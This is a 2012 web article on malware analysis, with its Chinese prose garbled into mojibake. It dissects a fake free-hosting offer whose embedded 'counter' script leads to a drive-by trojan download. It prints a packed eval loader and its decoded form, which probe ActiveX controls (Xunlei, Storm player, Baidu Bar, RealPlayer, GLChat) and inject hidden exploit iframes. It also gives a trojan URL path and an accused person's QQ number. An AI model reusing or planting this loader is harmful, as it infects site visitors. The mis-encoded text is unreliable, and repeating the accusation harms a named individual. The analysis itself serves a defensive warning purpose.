¹ÜÀíÉÌÆÌ ·¢²¼²úÆ· ·¢²¼Çó¹º Ñ°ÕÒÉÌ»ú
TOP
Ãâ·Ñ±³ºóµÄÏÝÚå ±»¶¯´«²¥Ä¾Âí
[ ±à¼­:qiraosky | Ê±¼ä:2012-03-20 21:51:58 | ä¯ÀÀ:347´Î | À´Ô´:µÂÖݵçÄÔ·þÎñÍø | ×÷Õß:µÂÖݵçÄÔ·þÎñÍø ]

        ǰ¼¸ÈÕ¿´µ½ÓÐÈËÌṩÃâ·ÑVPSºÍ¿Õ¼ä£¬¸Ð¾õÂùºÃÆæ¡£²Â²â¶Ô·½Òâͼδ¹û£¬±ã¼ÓÉÏQQѯÎÊ£¬½á¹û¼¸¾ä»°ÏÂÀ´ÏÅÎÒÒ»Ìø¡£´ËÈËÃâ·ÑÌṩ¿Õ¼ä»òvps£¬Ö»ÒªÇó¹ÒÒ»¶ÎJS´úÂ룬ÎÞÈÎºÎ¹ã¸æ ²»Ó°ÏìÍøÕ¾ ˵ĿµÄÊÇΪÁËË¢Á÷Á¿ºÍÅÅÃû£¡»°Ëµµ½´Ë¾Í¸Ð¾õ¶Ô·½ÔÚºú³¶£¬ÓÚÊÇÏÂÔØ¶Ô·½ÒªÇóµÄJSÒ»¿´£¬ÀïÃæÖ»Á¬½ÓÁËÒ»¸öJS URL£¬ÔÚÏÂÔÚ¿´ÓÖÊÇÒ»¸ö£¬Ã¿´Î¶¼Òª×ª³ÉHTML¿´£¬ºÃ¼¸¸öÏÂÀ´°ÑÀϺºÀÛ¸ö°ëËÀ£¡×îºóÖÕÓÚ³öÀ´Ò»¶Ñ¶«Î÷£¬×îÖÕÄ¿±ê×Ô¶¯ÏÂÔØÄ¾Âí£¡

       ÀûÓÃÒ»´ó¶Ñ©¶´£¬¾ßÌå´úÂë²»ÌùÁË£¬ÈðÐÇÃâɱµÄ£¬ÖÐÁËÂé·³£¡

DPClient.VodѸÀש¶´£»MPS.StormPlayer.1±©·çÓ°Òô©¶´£»
PowerPlayerCtrl.1DVD²¥·ÅÆ÷©¶´£»Pdg2 ³¬ÐÇÔÄÀÀÆ÷©¶´£»
GLCHAT.GLChatCtrl.1ÁªÖÚ´óÌü©¶´£»
BaiduBar.Tool.1°Ù¶È³¬¼¶ËѰÔ©¶´£¬......

Ê×Ïȼì²éÄãÊÇ·ñ°²×°WEBѸÀ×£¬ÎÞ°²×°µÄ»áµ¯³ö°²×°Ìáʾ£¬°²×°µÄ»áÀûÓÃxunlei©¶´×Ô¶¯ÏÂÔØ²¢Ö´ÐÐľÂí£¡

ÒªÇó¹ÒµÄ´úÂëÊÇ: 
< sc ri pt src="http://www.xxxxxx/count1.js"></ scr ip t> 
¿´ÆðÀ´Ïñͳ¼Æ,ÊǰÉ. 
È»ºóÎÒÏ»ØÀ´·ÖÎöÏÂ: 
documen  t.writ eln("<ifr ame src="http://xxxxxx/page/add_ 65543967.htm?0055" width=0 height=0>< /ifram e>") 
¿´µ½Á˰É,ÊÇ´ò¿ªÁ˵ÄÒ»¸ö¾²Ì¬Ò³Ãæ 
ÎÒÃÇÀ´¼ÌÐø·ÖÎö: 
http://xxxxxx/page/add_ 65543967.htm 
     ÆäʵÊÇ 
http://xxxxxxpageadd_ 65543967.htm(ÕâÊǵØÖ·)?0055(ÀàËÆÓÚͳ¼Æ) 
À´·ÖÎöÏÂÉÏÃæµÄÒ³Ãæ´úÂë: 
<  scr ipt src=addr.js(ÏÓÒɵØÖ·)></script> 
<script language="javascript" type="text/javascript" src="http://js.xxxxxx.la/xxxxxx.js(ͳ¼ÆµØÖ·)"></s crip t> 
Ìø¹ýͳ¼Æ,ÎÒÃÇÀ´¿´ÄǸöÏÓÒɵØÖ·addr.js: 
eva  l  (funct ion(p,a,c,k,e,d){e=function©{return(c<a?:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!.replace(/^/,String)){while(c--)d[e©]=k[c]||e©;k=[function(e){return d[e]}];e=function(){returnw+};c=1};while(c--)if(k[c])p=p.replace(new RegExp(+e©+,g),k[c]);return p}(z n=h 1f();n.1e(n.1d()+1c*A*A*1b);z y=h 1a(3.v);4(y.x("u=")==-1){j{4(19.18.17().x("w"+"16 7")==-1)3.f(<2 c=l:b a="9://8.5/w.k"></2>)}i(e){}3.v="u=15;13="+n.12();j{4(h m("11.10"))3.f(<2 c=l:b a="9://8.5/Z.k"></2>)}i(e){}j{4(h m("Y.X"+"W"+"V.1"))3.f(<2 c=l:b a="9://8.5/U.k"></2>)}i(e){}j{4(h m("T.S.1"))3.f(<2 c=l:b a="9://8.5/R.k"></2>)}i(e){}Q="P##########################!@#@!#O";j{q=h m("t"+"s"+".t"+"s.1");4(q.N("M")<="6.0.14.L"){K="J*(&F)(D*&F()*D&F)";3.f(<2 c=d+p+o:b a="9://8.5/r+I.g+4"></2>)}H{3.f(<2 c=d+p+o:b a="9://8.5/r+G.g+4"></2>)}}i(e){}j{4(h m("E.C.1"))3.f(<2 c=l:b a="9://8.5/B.k"></2>)}i(e){}},62,78,||iframe|document|if|cn|||51xiazai886|http|src|none|style|||write||new|catch|try|gif|display|ActiveXObject|Then|lay|isp|Link||PCtl|IER|Cookie1|cookie|ms|indexOf|bbbbcookie|var|60|lz|GLChatCtrl||GLCHAT||eal_new|else|eal|yyyyyyyyyyy|xxxxxxxxxxxxxfiudsif|552|PRODUCTVERSION|PlayerProperty|lasf|flsadjfljasfd|fakshdflkasdhfasdf|bd|Tool|BaiduBar|bf|layer|ormP|St|MPS|xl|Vod|DPClient|toGMTString|expires||POPWIN  DOS|ie|toLowerCase|userAgent|navigator|String|1000|24|getTime|setTime|Date.split(|),0,  {})) 
Ŷ,¼ÓÃÜÁËÄØ~ÄǾͽâ: 
var The n=ne w Da te();Then.setTime(Then.getTime()+24*60*60*1000);var bbbbcookie=new String(document.cookie);if(bbbbcookie.indexOf("Cookie1=")==-1){try{if(navigator.userAgent.toLowerCase().indexOf("ms"+"ie 7")==-1)document.write(<iframe style=display:none src="http://xxxx/ms.gif"></iframe>)}catch(e){}document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();try{if(new ActiveXObject("DPClient.Vod"))document.write(<iframe style=display:none src="http://xxxxx/xl.gif"></iframe>)}catch(e){}try{if(new ActiveXObject("MPS.St"+"ormP"+"layer.1"))document.write(<iframe style=display:none src="http://xxxxxxbf.gif"></iframe>)}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write(<iframe style=display:none src="http://xxxxxxx/bd.gif"></iframe>)}catch(e){}fakshdflkasdhfasdf="flsadjfljasfd##########################!@#@!#lasf";try{Link=new ActiveXObject("IER"+"PCtl"+".IER"+"PCtl.1");if(Link.PlayerProperty("PRODUCTVERSION")<="6.0.14.552"){xxxxxxxxxxxxxfiudsif="yyyyyyyyyyy*(&F)(D*&F()*D&F)";document.write(<iframe style=d+isp+lay:none src="http://xxxxxx.cn/r+eal_new.g+if"></iframe>)}}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write(<iframe style=display:none src="http://xxxxxxx/lz.gif"></iframe>)}catch(e)  { }} 
ºÃ¶àÍøÂí~»¹¶¼ÊÇGIF¸ñʽµÄ.ÔÚÕâÀï½²ÏÂС֪ʶ,GIF¸ñʽÊÇ¿ÉÒÔÖ´ÐÐHTMLÃüÁîµÄ,´ó¼Ò¿ÉÒÔÊÔÏÂ. 
Ëæ±ã½âÃÜÏÂXL.GIF(Ò»¿´¾ÍÏñÊÇѶÀ×µÄ,²»¹ý²»ÒªÍ¨¹ý¿´,Òª½øÐÐÕæÊµ·ÖÎö) 
Òò´úÂë¹ý³¤,ËùÒÔÎÒֻд³ö½âÃܵÄľÂíµØÖ·°É: 
http://xxxxxx/s.exe 
ÕâÀïµÄ֪ʶµã: Ôõô½øÐÐÍøÂíµÄ·Ö±æ: 
clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F  Õâ¸öµÄ¾ÍÊÇѶÀ׵Ġ 
×îºóÎÒÃÇÀ´·ÖÎöÕâ¸öľÂí
ɱ¶¾Íø±¨³öµÄÐÅÏ¢:

ɨÃè½á¹û :  22%µÄɱÈí(8/36)±¨¸æ·¢ÏÖ²¡¶¾Ê±¼ä :  2008/05/19 18:06:08 (CST)

AntiVir7.8.0.197.0.4.592008-05-19TR/Agent.4096.209
15.241Arcavir1.0.42008051901482008-05-19Heur.Win32.I
6.526BitDefender7.60825.12008237.190672008-05-19Trojan.Agent.AINZ
Dr.WEB4.44.0.91702008.05.192008-05-19Trojan.MulDrop.15725
F-PROT4.4.1.52200805182008-05-18Possible W32/Downloader-Sml-based!Maximus
SOPHOS2.73.04.292008-05-19Mal/Heuri-E
VBA323.12.6.620080518.15382008-05-18Win32.Trojan.Downloader (http://...) (suspicious)
Ç÷ÊÆ8.500-10015.284.032008-05-18TROJ_ZLOB.AKT

´ËÈËQQ 316070087 ÍøÕ¾Ëû×ÊÁÏÓÐ ¶Ô´úÂëÓÐÐËȤÕß¿ÉÒÔ¸´ÖÆËûµÄÍøÖ·´úÌæ< sc ri pt src="http://www.xxxxxx/count1.js"></ scr ip t>  ÖеÄxxxxxxÑо¿£¡

×îºó¼¸¾ä£¬ÎÞÉ̲»¼é ÌìÏÂÎÞÃâ·ÑµÄÎç²Í   ÂñÍ·¿à¸ÉʤÓÚ¹â˵²»Á·

¡¾´ó ÖРС¡¿ ¡¾´òÓ¡¡¿¡¾·±Ìå¡¿ ¡¾Í¶¸å¡¿ ¡¾¹Ø±Õ¡¿¡¾ÆÀÂÛ¡¿ ¡¾·µ»Ø¶¥²¿¡¿